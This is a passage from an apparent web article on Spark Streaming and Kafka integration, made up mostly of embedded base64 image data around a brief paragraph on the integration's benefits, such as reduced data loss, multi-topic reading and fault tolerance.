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F/j1daWQAmUQAmUQAmUQAmUQAmUQAmUwFUE6gC4ClsLlUAJlEAJlEAJlEAJlEAJlEAJlMC+CNQBsK/xamtLoARKoARKoARKoARKoARKoARK4CoCdQBcha2FSqAESqAESqAESqAESqAESqAESmBfBOoA2Nd4tbUlUAIlUAIlUAIlUAIlUAIlUAIlcBWBOgCuwtZCJVACJVACJVACJVACJVACJVACJbAvAnUA7Gu82toSKIESKIESKIESKIESKIESKIESuIpAHQBXYWuhEiiBEiiBEiiBEiiBEiiBEiiBEtgXgToA9jVebW0JlEAJlEAJlEAJlEAJlEAJlEAJXEWgDoCrsLVQCZRACZRACZRACZRACZRACZRACeyLQB0A+xqvtrYESqAESqAESqAESqAESqAESqAEriJQB8BV2FqoBEqgBEqgBEqgBEqgBEqgBEqgBPZFoA6AfY1XW1sCJVACJVACJVACJVACJVACJVACVxGoA+AqbC1UAiVQAiVQAiVQAiVQAiVQAiVQAvsiUAfAvsarrS2BEiiBEiiBEiiBEiiBEiiBEiiBqwjUAXAVthYqgRIogRIogRIogRIogRIogRIogX0RqANgX+PV1pZACZRACZRACZRACZRACZRACZTAVQT+f5OIu99za+LeAAAAAElFTkSuQmCC) There are several benefits of implementing Spark-Kafka integration. You can ensure minimum data loss through Spark Streaming while saving all the received Kafka data synchronously for an easy recovery. Users can read messages from a single topic or multiple Kafka topics. Along with this level of flexibility you can also access high scalability, throughput and fault-tolerance and a range of other benefits by using Spark and Kafka in tandem. This integration can be understood with a data pipeline that functions in the methodology shown below: ![image.png](data:image/png;base64,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